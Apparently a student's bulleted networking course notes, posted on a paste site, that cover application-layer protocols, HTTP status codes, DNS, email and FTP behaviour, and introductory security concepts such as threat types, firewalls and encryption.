- TCP [AppleMobileDeviceService.exe 127.0.0.1 : 27015 www:49159 ESTABLISHED 1852
- TCP [Skype.exe] 10.70.197.193: 59718 157.56.116.200: 1350 ESTABLISHED 2524
- Week 10
- Application
- Provide the data
- Application layer
- Prepared the data over the network
- Application Layer Protocols
- Hypertext Transfer Protocol (HTTP)
- Transfer files that make up webpages
- Secure HTTP (HTTPS)
- Secure transmission
- Post Office Protocol (POP)
- Inbound mail delivery
- Simple Mail Transfer Protocol (SMTP)
- Outbound mail delivery
- Domain Name Service (DNS)
- Server friendly name to IP and vice versa
- Dynamic Host Configuration Protocol (DHCP)
- Enables devices on network to obtain an IP address
- Telnet
- Provide remote access (command line) to servers and networking devices
- File Transfer Protocol (FTP)
- Interactive file transfers between systems
- Server Message Block (SMB)
- File sharing adopted by Microsoft
- Gnutella
- P2P
- Applications
- Provide users with way to create the data
- Email, web browsers, file sharing, word, excel, skype
- Application layer services
- Provides interface to the network
- Prepares the data according to protocol specific steps
- Application protocols
- Define the type and syntax of messages
- Define meaning of any informational fields
- Defines the request formats and expected responses
- WWW Services and HTTP
- When user types in an URL it is actually using three different commands
- HTTP
- Protocol
- www.cisco.com
- Server name
- Web-server.htm
- Specific file name requested
- HTTP
- Specifies a request/response
- GET
- Request for data
- POST and PUT
- Send messages to upload to the server
- Server Response Status Code
- 1xx: Informational
- Request received, continuing process
- 2xx: success
- Action was received, understood, accepted
- 3xx: Redirection
- Further action must be taken to complete request
- 4xx: client error
- Request contains bad syntax cannot be fulfilled
- 5xx: Server error
- Server failed to fulfill apparently valid request
- Application Types
- Client/Server (Master/Slave) Applications
- Describes relationship between two computer programs
- One makes the request of the other program while the other is subservient to the other’s said request
- Centralized dedicated servers
- Repositories of information
- Runs processes that listen to and service requests
- P2P Application
- Peer-to-peer communications in a model of same capabilities that either can initiate communication
- Decentralized non dedicated
- Desktops used as client
- DNS Protocol
- Domain name service
- DNS is a client/server service but a little different in that the DNS client runs as a service itself
- Supports name resolution for network applications that need it
- nslookup in commandline
- server provides name resolution using name daemon
- looks in its own records for name to IP address table, if it can’t find it will send a request
- ipconfig /displaydns will show cached dns entries
- Hierarchical system
- Top level domains
- .ca, .jp (representing contries )
- .com for commercial
- .org for organization
- Secondary level domains
- All companies registered to the address
- Google would be the secondary domain to the first level .com
- Email uses both PoP and SMTP
- PoP is used to receive email
- Receive, fetch, read
- Will launch USER, ASS, RETR, QUIT
- SMTP used to transfer mail
- Used to send mail
- If the mail is local it will delivery to the site
- If it is not local SMTP server will seek to find the server (rogers, gmail, Hotmail, etc) and do a DNS lookup to find it
- FTP
- Port 21 is the command/control port
- Takes the commands to upload or download
- Port 20 is the data port
- To transfer the data
- FTP is not firewall friendly
- By default FTP is in active mode
- Different port different socket the port will attempt to talk to you
- Firewall blocks it since the active mode by default unless you create a rule to allow it
- Best to configure FTP to passive mode
- Sends a request from file rather than FTP server
- Since it originates from inside the firewall it’s safe
- Security
- The Tenets of Security
- Confidentiality
- Integrity
- Availability
- Definitions
- Asset
- What we are trying to protect
- Vulnerability
- Weakness or flaw
- Threat
- What we are trying to protect against (exploits)
- Security controls
- Safeguards to avoid, counteract, minimize security risks
- Risk
- Potential for loss, damage, destruction
- Vulnerabilities and mitigating them
- Security program
- Policies
- IT security
- Management controls
- Technical safeguards
- Operational safeguards
- Physical security
- Don’t let random people with USB keys access information
- Awareness/Training
- Security Screening
- Network Device Security Measures
- Physical Security
- Protects against
- Hardware threats
- Environmental threats
- Electrical threats
- Maintenance threats
- Limit damage to equipment
- Lock up equipment and prevent unauthorized access
- Monitor and control entry with electronic logs
- Use security camera
- Network Threats
- Malicious code
- Virus
- Software used to infect a computer
- Buried in an existing program
- When program is executed virus code is activated and copies itself to other programs
- Worm
- Does not require host program
- Enters a computer through vulnerability in system and takes advantage of file-transport or information-transport features on systems
- Trojan horse
- Reconnaissance attacks
- Unauthorized discovery and mapping of systems, services, vulnerabilities
- Access attacks
- Unauthorized manipulation of data, system access, user privileges
- Denial of service
- Disabling or corruption of networks, systems, services
- Social engineering
- Firewalls
- Types
- Packet filtering
- Prevents or allows access based on IP or MAC address
- Application filtering
- Prevents or allows access by specifying application types on port numbers
- URL filtering
- Prevents or allows access to websites based upon URLs or keywords
- Stateful packet inspection
- Incoming packets must be legitimate responses to requests from internal hosts
- Unsolicited packets are blocked unless permitted specifically
- Encryption
- Symmetric
- Confidentiality
- AES, 3DES, Blowfish
- Asymmetric (Public-key cryptography)
- authentication
- Digital signature algorithm
- Hash
- Integrity
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement